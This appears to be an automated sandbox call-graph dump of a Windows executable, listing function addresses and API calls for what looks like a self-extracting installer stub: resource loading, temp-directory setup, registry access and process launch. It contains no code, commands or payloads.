MessageBeep 2329->2331 2330->2323 2330->2324 2393 7ff761f77f04 2331->2393 2334 7ff761f73ed3 MessageBoxA 2334->2324 2338 7ff761f7133c 2337->2338 2344 7ff761f714b5 2337->2344 2427 7ff761f711cc LoadLibraryA 2338->2427 2340 7ff761f78470 7 API calls 2342 7ff761f714da 2340->2342 2342->2144 2356 7ff761f77ac8 FindResourceA 2342->2356 2343 7ff761f7134d GetCurrentProcess OpenProcessToken 2343->2344 2345 7ff761f71377 GetTokenInformation 2343->2345 2344->2340 2346 7ff761f714a0 CloseHandle 2345->2346 2347 7ff761f713a0 GetLastError 2345->2347 2346->2344 2347->2346 2348 7ff761f713b5 LocalAlloc 2347->2348 2348->2346 2349 7ff761f713d2 GetTokenInformation 2348->2349 2350 7ff761f713fc AllocateAndInitializeSid 2349->2350 2351 7ff761f71491 LocalFree 2349->2351 2350->2351 2352 7ff761f71445 2350->2352 2351->2346 2353 7ff761f71481 FreeSid 2352->2353 2354 7ff761f71452 EqualSid 2352->2354 2355 7ff761f71476 2352->2355 2353->2351 2354->2352 2354->2355 2355->2353 2357 7ff761f77b63 2356->2357 2358 7ff761f77b03 LoadResource 2356->2358 2360 7ff761f74dcc 24 API calls 2357->2360 2358->2357 2359 7ff761f77b1d DialogBoxIndirectParamA FreeResource 2358->2359 2359->2357 2362 7ff761f77b87 2359->2362 2361 7ff761f77b82 2360->2361 2361->2362 2362->2158 2365 7ff761f77dd9 2364->2365 2366 7ff761f77d88 2364->2366 2365->2277 2367 7ff761f77d90 IsDBCSLeadByte 2366->2367 2368 7ff761f77db6 CharNextA 2366->2368 2367->2366 2368->2365 2368->2366 2370 7ff761f77bc8 2369->2370 2370->2370 2371 7ff761f77bec CharPrevA 2370->2371 2372 7ff761f77bda 2370->2372 2371->2372 2372->2297 2374 7ff761f78685 RtlVirtualUnwind 2373->2374 2375 7ff761f786c7 2373->2375 2374->2375 2378 7ff761f78494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2375->2378 2381 7ff761f72a2f 2380->2381 2391 7ff761f72872 2380->2391 2383 7ff761f72a41 GlobalFree 2381->2383 2384 7ff761f72a50 2381->2384 2383->2384 2384->2329 2385 7ff761f728a5 GetFileVersionInfoSizeA 2386 7ff761f728c2 GlobalAlloc 2385->2386 2385->2391 2386->2381 2387 7ff761f728e1 GlobalLock 2386->2387 2387->2381 2388 7ff761f728fc GetFileVersionInfoA 2387->2388 2389 7ff761f72920 VerQueryValueA 2388->2389 2388->2391 2390 7ff761f729ed GlobalUnlock 2389->2390 2389->2391 2390->2391 2391->2381 2391->2385 2391->2390 2392 7ff761f729d9 GlobalUnlock 2391->2392 2408 7ff761f7261c 2391->2408 2392->2381 2394 7ff761f78076 2393->2394 2395 7ff761f77f44 GetVersionExA 2393->2395 2397 7ff761f78470 7 API calls 2394->2397 2395->2394 2396 7ff761f77f6d 2395->2396 2396->2394 2399 7ff761f77f90 GetSystemMetrics 2396->2399 2398 7ff761f73eca 2397->2398 2398->2334 2404 7ff761f77e34 2398->2404 2399->2394 2400 7ff761f77fa7 RegOpenKeyExA 2399->2400 2400->2394 2401 7ff761f77fdc RegQueryValueExA RegCloseKey 2400->2401 2401->2394 2403 7ff761f78026 2401->2403 2402 7ff761f78065 CharNextA 2402->2403 2403->2394 2403->2402 2405 7ff761f77edd 2404->2405 2406 7ff761f77e5a EnumResourceLanguagesA 2404->2406 2405->2334 2406->2405 2407 7ff761f77e9f EnumResourceLanguagesA 2406->2407 2407->2405 2409 7ff761f7265b CharUpperA CharNextA CharNextA 2408->2409 2410 7ff761f727e0 GetSystemDirectoryA 2408->2410 2411 7ff761f727dd 2409->2411 2412 7ff761f7269c 2409->2412 2413 7ff761f727f1 2410->2413 2411->2410 2414 7ff761f727c7 GetWindowsDirectoryA 2412->2414 2415 7ff761f726a6 2412->2415 2416 7ff761f72805 2413->2416 2417 7ff761f77ba8 CharPrevA 2413->2417 2414->2413 2420 7ff761f77ba8 CharPrevA 2415->2420 2418 7ff761f78470 7 API calls 2416->2418 2417->2416 2419 7ff761f72814 2418->2419 2419->2391 2421 7ff761f72705 RegOpenKeyExA 2420->2421 2421->2413 2422 7ff761f72738 RegQueryValueExA 2421->2422 2423 7ff761f7276b 2422->2423 2424 7ff761f727b4 RegCloseKey 2422->2424 2425 7ff761f72774 ExpandEnvironmentStringsA 2423->2425 2426 7ff761f72792 2423->2426 2424->2413 2425->2426 2426->2424 2428 7ff761f712bb 2427->2428 2429 7ff761f71221 GetProcAddress 2427->2429 2432 7ff761f78470 7 API calls 2428->2432 2430 7ff761f712ac FreeLibrary 2429->2430 2431 7ff761f7123f AllocateAndInitializeSid 2429->2431 2430->2428 2431->2430 2434 7ff761f71288 FreeSid 2431->2434 2433 7ff761f712ca 2432->2433 2433->2343 2433->2344 2434->2430 2437 7ff761f75050 7 API calls 2436->2437 2438 7ff761f760bf LocalAlloc 2437->2438 2439 7ff761f760dd 2438->2439 2440 7ff761f7610b 2438->2440 2442 7ff761f74dcc 24 API calls 2439->2442 2441 7ff761f75050 7 API calls 2440->2441 2444 7ff761f7611d 2441->2444 2443 7ff761f760fb 2442->2443 2657 7ff761f77700 GetLastError 2443->2657 2446 7ff761f7615a lstrcmpA 2444->2446 2447 7ff761f76121 2444->2447 2449 7ff761f7618a 2446->2449 2450 7ff761f76174 LocalFree 2446->2450 2448 7ff761f74dcc 24 API calls 2447->2448 2452 7ff761f7613f LocalFree 2448->2452 2453 7ff761f74dcc 24 API calls 2449->2453 2451 7ff761f73123 2450->2451 2451->2161 2451->2162 2451->2167 2452->2451 2454 7ff761f761ac LocalFree 2453->2454 2455 7ff761f76100 2454->2455 2455->2451 2457 7ff761f75050 7 API calls 2456->2457 2458 7ff761f76001 2457->2458 2459 7ff761f7604a 2458->2459 2460 7ff761f76006 2458->2460 2462 7ff761f75050 7 API calls 2459->2462 2461 7ff761f74dcc 24 API calls 2460->2461 2463 7ff761f76025 2461->2463 2464 7ff761f76063 2462->2464 2465 7ff761f73146 2463->2465 2466 7ff761f7772c 13 API calls 2464->2466 2465->2167 2470 7ff761f766c4 2465->2470 2467 7ff761f7606f 2466->2467 2467->2465 2468 7ff761f76073 2467->2468 2469 7ff761f74dcc 24 API calls 2468->2469 2469->2463 2471 7ff761f75050 7 API calls 2470->2471 2472 7ff761f76706 LocalAlloc 2471->2472 2473 7ff761f76756 2472->2473 2474 7ff761f76726 2472->2474 2475 7ff761f75050 7 API calls 2473->2475 2476 7ff761f74dcc 24 API calls 2474->2476 2477 7ff761f76768 2475->2477 2478 7ff761f76744 2476->2478 2479 7ff761f7676c 2477->2479 2480 7ff761f767a5 lstrcmpA LocalFree 2477->2480 2682 7ff761f77700 GetLastError 2478->2682 2482 7ff761f74dcc 24 API calls 2479->2482 2483 7ff761f767ec 2480->2483 2484 7ff761f76837 2480->2484 2488 7ff761f7678a LocalFree 2482->2488 2493 7ff761f764e4 53 API calls 2483->2493 2487 7ff761f76b14 2484->2487 2490 7ff761f7684f GetTempPathA 2484->2490 2485 7ff761f76749 2486 7ff761f7674f 2485->2486 2491 7ff761f78470 7 API calls 2486->2491 2489 7ff761f77ac8 28 API calls 2487->2489 2488->2486 2489->2486 2492 7ff761f76872 2490->2492 2508 7ff761f768a5 2490->2508 2494 7ff761f73153 2491->2494 2658 7ff761f764e4 2492->2658 2496 7ff761f7680c 2493->2496 2494->2167 2494->2173 2496->2486 2498 7ff761f76814 2496->2498 2499 7ff761f74dcc 24 API calls 2498->2499 2499->2485 2500 7ff761f76adb GetWindowsDirectoryA 2505 7ff761f76ca4 38 API calls 2500->2505 2501 7ff761f768f9 GetDriveTypeA 2503 7ff761f76916 GetFileAttributesA 2501->2503 2518 7ff761f76911 2501->2518 2503->2518 2505->2508 2506 7ff761f764e4 53 API calls 2506->2508 2507 7ff761f76ca4 38 API calls 2507->2518 2508->2486 2508->2500 2508->2501 2509 7ff761f76955 GetDiskFreeSpaceA 2511 7ff761f76983 MulDiv 2509->2511 2509->2518 2510 7ff761f72468 25 API calls 2510->2518 2511->2518 2512 7ff761f76a02 GetWindowsDirectoryA 2512->2518 2513 7ff761f77ba8 CharPrevA 2514 7ff761f76a2a GetFileAttributesA 2513->2514 2515 7ff761f76a40 CreateDirectoryA 2514->2515 2514->2518 2515->2518 2516 7ff761f76a6d SetFileAttributesA 2516->2518 2517 7ff761f764e4 53 API calls 2517->2518 2518->2486 2518->2500 2518->2501 2518->2503 2518->2507 2518->2509 2518->2510 2518->2512 2518->2513 2518->2516 2518->2517 2520 7ff761f76d12 2519->2520 2521 7ff761f76d3f GetDiskFreeSpaceA 2519->2521 2524 7ff761f74dcc 24 API calls 2520->2524 2522 7ff761f76f63 memset 2521->2522 2523 7ff761f76d80 MulDiv 2521->2523 2736 7ff761f77700 GetLastError 2522->2736 2523->2522 2526 7ff761f76dae GetVolumeInformationA 2523->2526 2527 7ff761f76d2f 2524->2527 2530 7ff761f76e45 SetCurrentDirectoryA 2526->2530 2531 7ff761f76de6 memset 2526->2531 2717 7ff761f77700 GetLastError 2527->2717 2529 7ff761f76f7b GetLastError FormatMessageA 2533 7ff761f76fbd 2529->2533 2540 7ff761f76e6c 2530->2540 2718 7ff761f77700 GetLastError 2531->2718 2532 7ff761f76d34 2535 7ff761f76f41 2532->2535 2536 7ff761f74dcc 24 API calls 2533->2536 2539 7ff761f78470 7 API calls 2535->2539 2538 7ff761f76fd8 SetCurrentDirectoryA 2536->2538 2537 7ff761f76dfe GetLastError FormatMessageA 2537->2533 2538->2535 2542 7ff761f7326f 2539->2542 2541 7ff761f76eb4 2540->2541 2544 7ff761f76ed8 2540->2544 2543 7ff761f74dcc 24 API calls 2541->2543 2542->2167 2542->2180 2543->2532 2544->2535 2719 7ff761f724f8 2544->2719 2547 7ff761f75050 7 API calls 2546->2547 2548 7ff761f75dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff761f75dfc 2548->2549 2565 7ff761f75fcf 2548->2565 2550 7ff761f75e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2549->2550 2551 7ff761f75e56 2549->2551 2550->2551 2737 7ff761f75c60 #20 2551->2737 2554 7ff761f75e69 #20 2555 7ff761f75e5f 2554->2555 2556 7ff761f75ed1 #22 2554->2556 2557 7ff761f74dcc 24 API calls 2555->2557 2558 7ff761f75f55 2556->2558 2559 7ff761f75f15 #23 2556->2559 2560 7ff761f75f53 2557->2560 2561 7ff761f75f75 2558->2561 2562 7ff761f75f61 FreeResource 2558->2562 2559->2555 2559->2558 2560->2558 2563 7ff761f75f9f 2561->2563 2564 7ff761f75f81 2561->2564 2562->2561 2563->2565 2567 7ff761f75fb1 SendMessageA 2563->2567 2566 7ff761f74dcc 24 API calls 2564->2566 2565->2201 2566->2563 2567->2565 2569 7ff761f74118 2568->2569 2586 7ff761f7412f 2568->2586 2570 7ff761f75050 7 API calls 2569->2570 2570->2586 2571 7ff761f74145 memset 2571->2586 2572 7ff761f74254 2573 7ff761f74dcc 24 API calls 2572->2573 2611 7ff761f74273 2573->2611 2574 7ff761f744ee 2577 7ff761f78470 7 API calls 2574->2577 2576 7ff761f75050 7 API calls 2576->2586 2578 7ff761f744ff 2577->2578 2578->2192 2579 7ff761f745d8 2579->2574 2582 7ff761f745f2 RegOpenKeyExA 2579->2582 2580 7ff761f742f5 CompareStringA 2580->2579 2580->2586 2581 7ff761f744df LocalFree 2581->2574 2582->2574 2587 7ff761f74627 RegQueryValueExA 2582->2587 2583 7ff761f74599 2585 7ff761f74dcc 24 API calls 2583->2585 2588 7ff761f745b8 LocalFree 2585->2588 2586->2571 2586->2572 2586->2574 2586->2576 2586->2579 2586->2580 2586->2581 2586->2583 2592 7ff761f74394 2586->2592 2594 7ff761f744ad LocalFree 2586->2594 2597 7ff761f741fd CompareStringA 2586->2597 2764 7ff761f71684 2586->2764 2803 7ff761f71d28 memset memset RegCreateKeyExA 2586->2803 2830 7ff761f7473c CreateProcessA 2586->2830 2590 7ff761f7471c RegCloseKey 2587->2590 2591 7ff761f7466c memset GetSystemDirectoryA 2587->2591 2588->2574 2590->2574 2595 7ff761f7469d 2591->2595 2596 7ff761f746b3 2591->2596 2600 7ff761f743a5 GetProcAddress 2592->2600 2601 7ff761f74574 2592->2601 2612 7ff761f744d3 FreeLibrary 2592->2612 2613 7ff761f74480 FreeLibrary 2592->2613 2845 7ff761f779f0 2592->2845 2594->2579 2594->2586 2599 7ff761f77ba8 CharPrevA 2595->2599 2598 7ff761f7114c _vsnprintf 2596->2598 2597->2586 2602 7ff761f746dc RegSetValueExA 2598->2602 2599->2596 2600->2592 2603 7ff761f74521 2600->2603 2604 7ff761f74dcc 24 API calls 2601->2604 2602->2590 2607 7ff761f74dcc 24 API calls 2603->2607 2606 7ff761f74597 2604->2606 2608 7ff761f74553 LocalFree 2606->2608 2609 7ff761f74544 FreeLibrary 2607->2609 2855 7ff761f77700 GetLastError 2608->2855 2609->2608 2611->2574 2612->2581 2613->2594 2615 7ff761f75050 7 API calls 2614->2615 2616 7ff761f73f8b LocalAlloc 2615->2616 2617 7ff761f73fdd 2616->2617 2618 7ff761f73fad 2616->2618 2620 7ff761f75050 7 API calls 2617->2620 2619 7ff761f74dcc 24 API calls 2618->2619 2621 7ff761f73fcb 2619->2621 2622 7ff761f73fef 2620->2622 2892 7ff761f77700 GetLastError 2621->2892 2624 7ff761f73ff3 2622->2624 2625 7ff761f74030 lstrcmpA 2622->2625 2628 7ff761f74dcc 24 API calls 2624->2628 2626 7ff761f7404e 2625->2626 2627 7ff761f74098 LocalFree 2625->2627 2630 7ff761f77ac8 28 API calls 2626->2630 2632 7ff761f73139 2627->2632 2629 7ff761f74011 LocalFree 2628->2629 2629->2632 2631 7ff761f7406e LocalFree 2630->2631 2631->2632 2632->2161 2632->2167 2633->2196 2635 7ff761f7778a 2634->2635 2636 7ff761f7114c _vsnprintf 2635->2636 2642 7ff761f777b8 FreeResource 2635->2642 2643 7ff761f77803 FreeResource 2635->2643 2637 7ff761f777df FindResourceA 2636->2637 2638 7ff761f7775e LoadResource LockResource 2637->2638 2639 7ff761f77801 2637->2639 2638->2635 2638->2639 2640 7ff761f78470 7 API calls 2639->2640 2641 7ff761f7782e 2640->2641 2641->2184 2642->2635 2643->2639 2645 7ff761f75050 7 API calls 2644->2645 2646 7ff761f74967 LocalAlloc 2645->2646 2647 7ff761f749a9 2646->2647 2648 7ff761f74989 2646->2648 2649 7ff761f75050 7 API calls 2647->2649 2650 7ff761f74dcc 24 API calls 2648->2650 2652 7ff761f749bb 2649->2652 2651 7ff761f749a7 2650->2651 2651->2167 2653 7ff761f749d5 lstrcmpA 2652->2653 2654 7ff761f749bf 2652->2654 2653->2654 2655 7ff761f74a0e LocalFree 2653->2655 2656 7ff761f74dcc 24 API calls 2654->2656 2655->2651 2656->2655 2657->2455 2659 7ff761f76516 2658->2659 2662 7ff761f765dd 2658->2662 2689 7ff761f763b8 2659->2689 2661 7ff761f76688 2665 7ff761f78470 7 API calls 2661->2665 2700 7ff761f76b70 2662->2700 2669 7ff761f766a8 2665->2669 2667 7ff761f765cc 2672 7ff761f77ba8 CharPrevA 2667->2672 2668 7ff761f76577 GetSystemInfo 2677 7ff761f76591 2668->2677 2669->2486 2683 7ff761f72468 GetWindowsDirectoryA 2669->2683 2670 7ff761f76649 2670->2661 2675 7ff761f76ca4 38 API calls 2670->2675 2671 7ff761f7662a CreateDirectoryA 2673 7ff761f7667d 2671->2673 2674 7ff761f7663f 2671->2674 2672->2662 2712 7ff761f77700 GetLastError 2673->2712 2674->2670 2679 7ff761f7665a 2675->2679 2677->2667 2678 7ff761f77ba8 CharPrevA 2677->2678 2678->2667 2679->2661 2681 7ff761f76666 RemoveDirectoryA 2679->2681 2680 7ff761f76682 2680->2661 2681->2661 2682->2485 2684 7ff761f724a6 2683->2684 2685 7ff761f724c4 2683->2685 2686 7ff761f74dcc 24 API calls 2684->2686 2687 7ff761f78470 7 API calls 2685->2687 2686->2685 2688 7ff761f724df 2687->2688 2688->2506 2688->2508 2691 7ff761f763e3 2689->2691 2692 7ff761f77ba8 CharPrevA 2691->2692 2695 7ff761f7644b GetTempFileNameA 2691->2695 2713 7ff761f7114c 2691->2713 2693 7ff761f76420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff761f764b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff761f76490 2694->2696 2695->2696 2697 7ff761f7646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff761f78470 7 API calls 2696->2698 2697->2696 2699 7ff761f764a2 2698->2699 2699->2661 2699->2667 2699->2668 2701 7ff761f76b8b 2700->2701 2701->2701 2702 7ff761f76b94 LocalAlloc 2701->2702 2703 7ff761f76bf5 2702->2703 2704 7ff761f76bb4 2702->2704 2707 7ff761f77ba8 CharPrevA 2703->2707 2705 7ff761f74dcc 24 API calls 2704->2705 2706 7ff761f76bd2 2705->2706 2711 7ff761f76626 2706->2711 2716 7ff761f77700 GetLastError 2706->2716 2709 7ff761f76c14 CreateFileA LocalFree 2707->2709 2709->2706 2710 7ff761f76c61 CloseHandle GetFileAttributesA 2709->2710 2710->2706 2711->2670 2711->2671 2712->2680 2714 7ff761f71178 _vsnprintf 2713->2714 2715 7ff761f71199 2713->2715 2714->2715 2715->2691 2716->2711 2717->2532 2718->2537 2720 7ff761f72525 2719->2720 2721 7ff761f72562 2719->2721 2724 7ff761f7114c _vsnprintf 2720->2724 2722 7ff761f725ab 2721->2722 2723 7ff761f72567 2721->2723 2726 7ff761f7255d 2722->2726 2731 7ff761f7114c _vsnprintf 2722->2731 2725 7ff761f7114c _vsnprintf 2723->2725 2727 7ff761f7253d 2724->2727 2730 7ff761f7257f 2725->2730 2728 7ff761f78470 7 API calls 2726->2728 2729 7ff761f74dcc 24 API calls 2727->2729 2732 7ff761f72609 2728->2732 2729->2726 2733 7ff761f74dcc 24 API calls 2730->2733 2734 7ff761f725c7 2731->2734 2732->2535 2733->2726 2735 7ff761f74dcc 24 API calls 2734->2735 2735->2726 2736->2529 2738 7ff761f75ced 2737->2738 2748 7ff761f75d62 2737->2748 2749 7ff761f75380 2738->2749 2740 7ff761f78470 7 API calls 2742 7ff761f75d78 2740->2742 2742->2554 2742->2555 2743 7ff761f75d0d #21 2744 7ff761f75d28 2743->2744 2743->2748 2744->2748 2761 7ff761f75770 2744->2761 2747 7ff761f75d4f #23 2747->2748 2748->2740 2750 7ff761f753b3 2749->2750 2751 7ff761f753fd lstrcmpA 2750->2751 2752 7ff761f753d0 2750->2752 2754 7ff761f753f4 2751->2754 2755 7ff761f75454 2751->2755 2753 7ff761f74dcc 24 API calls 2752->2753 2753->2754 2754->2743 2754->2748 2755->2754 2756 7ff761f754a8 CreateFileA 2755->2756 2756->2754 2758 7ff761f754de 2756->2758 2757 7ff761f75561 CreateFileA 2757->2754 2758->2754 2758->2757 2759 7ff761f75549 CharNextA 2758->2759 2760 7ff761f75532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff761f757a4 CloseHandle 2761->2762 2763 7ff761f7578f 2761->2763 2762->2763 2763->2747 2763->2748 2765 7ff761f716d3 2764->2765 2856 7ff761f715e8 2765->2856 2768 7ff761f77ba8 CharPrevA 2769 7ff761f71766 2768->2769 2770 7ff761f77d68 2 API calls 2769->2770 2771 7ff761f71811 2770->2771 2772 7ff761f71a1b 2771->2772 2773 7ff761f7181a CompareStringA 2771->2773 2775 7ff761f77d68 2 API calls 2772->2775 2773->2772 2774 7ff761f7184d GetFileAttributesA 2773->2774 2776 7ff761f71867 2774->2776 2777 7ff761f719f3 2774->2777 2778 7ff761f71a28 2775->2778 2776->2777 2781 7ff761f715e8 2 API calls 2776->2781 2782 7ff761f74dcc 24 API calls 2777->2782 2779 7ff761f71acb LocalAlloc 2778->2779 2780 7ff761f71a31 CompareStringA 2778->2780 2779->2777 2783 7ff761f71aeb GetFileAttributesA 2779->2783 2780->2779 2787 7ff761f71a60 2780->2787 2784 7ff761f7188b 2781->2784 2801 7ff761f7194f 2782->2801 2785 7ff761f71b01 2783->2785 2786 7ff761f718b5 LocalAlloc 2784->2786 2788 7ff761f715e8 2 API calls 2784->2788 2802 7ff761f71b54 2785->2802 2786->2777 2789 7ff761f718d7 GetPrivateProfileIntA GetPrivateProfileStringA 2786->2789 2787->2787 2791 7ff761f71a81 LocalAlloc 2787->2791 2788->2786 2792 7ff761f71984 2789->2792 2789->2801 2790 7ff761f78470 7 API calls 2793 7ff761f71be9 2790->2793 2791->2777 2796 7ff761f71ab2 2791->2796 2794 7ff761f719ba 2792->2794 2795 7ff761f71995 GetShortPathNameA 2792->2795 2793->2586 2800 7ff761f7114c _vsnprintf 2794->2800 2795->2794 2798 7ff761f7114c _vsnprintf 2796->2798 2798->2801 2799 7ff761f71bd1 2799->2790 2800->2801 2801->2799 2864 7ff761f72a6c 2802->2864 2804 7ff761f71dce 2803->2804 2805 7ff761f72019 2803->2805 2808 7ff761f7114c _vsnprintf 2804->2808 2810 7ff761f71e25 2804->2810 2806 7ff761f78470 7 API calls 2805->2806 2807 7ff761f72028 2806->2807 2807->2586 2809 7ff761f71dee RegQueryValueExA 2808->2809 2809->2804 2809->2810 2811 7ff761f71e29 RegCloseKey 2810->2811 2812 7ff761f71e46 GetSystemDirectoryA 2810->2812 2811->2805 2813 7ff761f77ba8 CharPrevA 2812->2813 2814 7ff761f71e6a LoadLibraryA 2813->2814 2815 7ff761f71f55 GetModuleFileNameA 2814->2815 2816 7ff761f71e86 GetProcAddress FreeLibrary 2814->2816 2818 7ff761f71f78 RegCloseKey 2815->2818 2821 7ff761f71ee8 2815->2821 2816->2815 2817 7ff761f71ebe GetSystemDirectoryA 2816->2817 2819 7ff761f71ed5 2817->2819 2817->2821 2818->2805 2820 7ff761f77ba8 CharPrevA 2819->2820 2820->2821 2821->2821 2822 7ff761f71f11 LocalAlloc 2821->2822 2823 7ff761f71f8e 2822->2823 2824 7ff761f71f35 2822->2824 2826 7ff761f7114c _vsnprintf 2823->2826 2825 7ff761f74dcc 24 API calls 2824->2825 2827 7ff761f71f53 2825->2827 2828 7ff761f71fc4 2826->2828 2827->2818 2828->2828 2829 7ff761f71fcd RegSetValueExA RegCloseKey LocalFree 2828->2829 2829->2805 2831 7ff761f748b3 2830->2831 2832 7ff761f747c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff761f77700 GetLastError 2831->2891 2833 7ff761f747f9 2832->2833 2839 7ff761f72318 18 API calls 2833->2839 2844 7ff761f7482a CloseHandle CloseHandle 2833->2844 2835 7ff761f748b8 GetLastError FormatMessageA 2836 7ff761f74dcc 24 API calls 2835->2836 2838 7ff761f7491c 2836->2838 2841 7ff761f78470 7 API calls 2838->2841 2842 7ff761f7484d 2839->2842 2840 7ff761f748aa 2840->2838 2843 7ff761f7492f 2841->2843 2842->2844 2843->2586 2844->2838 2844->2840 2846 7ff761f77a25 2845->2846 2847 7ff761f77ba8 CharPrevA 2846->2847 2848 7ff761f77a63 GetFileAttributesA 2847->2848 2849 7ff761f77a79 2848->2849 2850 7ff761f77a96 LoadLibraryA 2848->2850 2849->2850 2851 7ff761f77a7d LoadLibraryExA 2849->2851 2852 7ff761f77aa9 2850->2852 2851->2852 2853 7ff761f78470 7 API calls 2852->2853 2854 7ff761f77ab9 2853->2854 2854->2592 2855->2611 2857 7ff761f71609 2856->2857 2859 7ff761f71621 2857->2859 2860 7ff761f71651 2857->2860 2877 7ff761f77ce8 2857->2877 2861 7ff761f77ce8 2 API calls 2859->2861 2860->2768 2860->2769 2862 7ff761f7162f 2861->2862 2862->2860 2863 7ff761f77ce8 2 API calls 2862->2863 2863->2862 2865 7ff761f72c24 2864->2865 2866 7ff761f72aa0 GetModuleFileNameA 2864->2866 2867 7ff761f78470 7 API calls 2865->2867 2866->2865 2868 7ff761f72ac8 2866->2868 2870 7ff761f72c37 2867->2870 2869 7ff761f72acc IsDBCSLeadByte 2868->2869 2871 7ff761f72bf6 CharNextA 2868->2871 2872 7ff761f72af1 CharNextA CharUpperA 2868->2872 2873 7ff761f72c08 CharNextA 2868->2873 2876 7ff761f72b36 CharPrevA 2868->2876 2882 7ff761f77c40 2868->2882 2869->2868 2870->2799 2871->2873 2872->2868 2874 7ff761f72b9b CharUpperA 2872->2874 2873->2865 2873->2869 2874->2868 2876->2868 2879 7ff761f77d00 2877->2879 2878 7ff761f77d47 2878->2857 2879->2878 2880 7ff761f77d0a IsDBCSLeadByte 2879->2880 2881 7ff761f77d30 CharNextA 2879->2881 2880->2878 2880->2879 2881->2879 2883 7ff761f77c58 2882->2883 2883->2883 2884 7ff761f77c61 CharPrevA 2883->2884 2885 7ff761f77c7d CharPrevA 2884->2885 2886 7ff761f77c75 2885->2886 2887 7ff761f77c94 2885->2887 2886->2885 2886->2887 2888 7ff761f77cc7 2887->2888 2889 7ff761f77c9e CharPrevA 2887->2889 2890 7ff761f77cb5 CharNextA 2887->2890 2888->2868 2889->2888 2889->2890 2890->2888 2891->2835 2892->2632 2894 7ff761f722eb 2893->2894 2895 7ff761f72281 2893->2895 2897 7ff761f78470 7 API calls 2894->2897 2896 7ff761f77ba8 CharPrevA 2895->2896 2898 7ff761f72294 WritePrivateProfileStringA _lopen 2896->2898 2899 7ff761f722fd 2897->2899 2898->2894 2900 7ff761f722c7 _llseek _lclose 2898->2900 2899->2225 2900->2894 3000 7ff761f73840 3001 7ff761f7385a 3000->3001 3002 7ff761f73852 3000->3002 3003 7ff761f738ec EndDialog 3001->3003 3006 7ff761f7385f 3001->3006 3002->3001 3004 7ff761f7388e GetDesktopWindow 3002->3004 3003->3006 3005 7ff761f74c68 14 API calls 3004->3005 3007 7ff761f738a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3005->3007 3007->3006 3008 7ff761f71500 3009 7ff761f71557 GetDesktopWindow 3008->3009 3010 7ff761f71530 3008->3010 3011 7ff761f74c68 14 API calls 3009->3011 3012 7ff761f71553 3010->3012 3014 7ff761f71542 EndDialog 3010->3014 3013 7ff761f7156e LoadStringA SetDlgItemTextA MessageBeep 3011->3013 3015 7ff761f78470 7 API calls 3012->3015 3013->3012 3014->3012 3016 7ff761f715d0 3015->3016 3019 7ff761f78750 3020 7ff761f78782 3019->3020 3021 7ff761f7875f 3019->3021 3021->3020 3022 7ff761f7877b ?terminate@ 3021->3022 3022->3020 3023 7ff761f78790 SetUnhandledExceptionFilter 2942 7ff761f73910 2943 7ff761f73933 2942->2943 2944 7ff761f73a09 2942->2944 2943->2944 2945 7ff761f73948 2943->2945 2946 7ff761f73a11 GetDesktopWindow 2943->2946 2947 7ff761f73b1a EndDialog 2944->2947 2950 7ff761f73954 2944->2950 2948 7ff761f7397b 2945->2948 2949 7ff761f7394c 2945->2949 2965 7ff761f74c68 6 API calls 2946->2965 2947->2950 2948->2950 2953 7ff761f73985 ResetEvent 2948->2953 2949->2950 2952 7ff761f7395b TerminateThread 2949->2952 2952->2947 2957 7ff761f74dcc 24 API calls 2953->2957 2955 7ff761f73a9b SetWindowTextA CreateThread 2955->2950 2958 7ff761f73ae8 2955->2958 2956 7ff761f73a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2956->2955 2959 7ff761f739c3 2957->2959 2960 7ff761f74dcc 24 API calls 2958->2960 2961 7ff761f739e4 SetEvent 2959->2961 2963 7ff761f739cc SetEvent 2959->2963 2962 7ff761f73b07 2960->2962 2970 7ff761f73b40 2961->2970 2962->2944 2963->2950 2967 7ff761f74d3f SetWindowPos 2965->2967 2968 7ff761f78470 7 API calls 2967->2968 2969 7ff761f73a2f 2968->2969 2969->2955 2969->2956 2971 7ff761f73b4c MsgWaitForMultipleObjects 2970->2971 2972 7ff761f73be5 2971->2972 2973 7ff761f73b74 PeekMessageA 2971->2973 2972->2944 2973->2971 2976 7ff761f73b99 2973->2976 2974 7ff761f73ba7 DispatchMessageA 2975 7ff761f73bb8 PeekMessageA 2974->2975 2975->2976 2976->2971 2976->2972 2976->2974 2976->2975 2977 7ff761f75690 2978 7ff761f73b40 4 API calls 2977->2978 2979 7ff761f756b1 2978->2979 2980 7ff761f756c2 WriteFile 2979->2980 2982 7ff761f756ba 2979->2982 2981 7ff761f756f9 2980->2981 2980->2982 2981->2982 2983 7ff761f75725 SendDlgItemMessageA 2981->2983 2983->2982 3100 7ff761f780d0 3101 7ff761f780e2 3100->3101 3107 7ff761f78818 GetModuleHandleW 3101->3107 3103 7ff761f78149 __set_app_type 3104 7ff761f78186 3103->3104 3105 7ff761f7819c 3104->3105 3106 7ff761f7818f __setusermatherr 3104->3106 3106->3105 3108 7ff761f7882d 3107->3108 3108->3103

                                                                                                                      Callgraph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      • Opacity -> Relevance
                                                                                                                      • Disassembly available
                                                                                                                      callgraph 0 Function_00007FF761F78A9C 1 Function_00007FF761F7261C 12 Function_00007FF761F77BA8 1->12 68 Function_00007FF761F78470 1->68 88 Function_00007FF761F71008 1->88 2 Function_00007FF761F78818 25 Function_00007FF761F787BC 2->25 3 Function_00007FF761F72318 31 Function_00007FF761F72244 3->31 4 Function_00007FF761F75B18 5 Function_00007FF761F78417 6 Function_00007FF761F76CA4 38 Function_00007FF761F74DCC 6->38 6->68 76 Function_00007FF761F724F8 6->76 84 Function_00007FF761F77700 6->84 7 Function_00007FF761F760A4 7->38 46 Function_00007FF761F75050 7->46 7->84 8 Function_00007FF761F77024 9 Function_00007FF761F733A0 10 Function_00007FF761F7772C 36 Function_00007FF761F7114C 10->36 10->68 11 Function_00007FF761F7512C 78 Function_00007FF761F71084 11->78 11->88 12->78 13 Function_00007FF761F71D28 13->12 13->36 13->38 13->68 14 Function_00007FF761F770A8 14->8 14->12 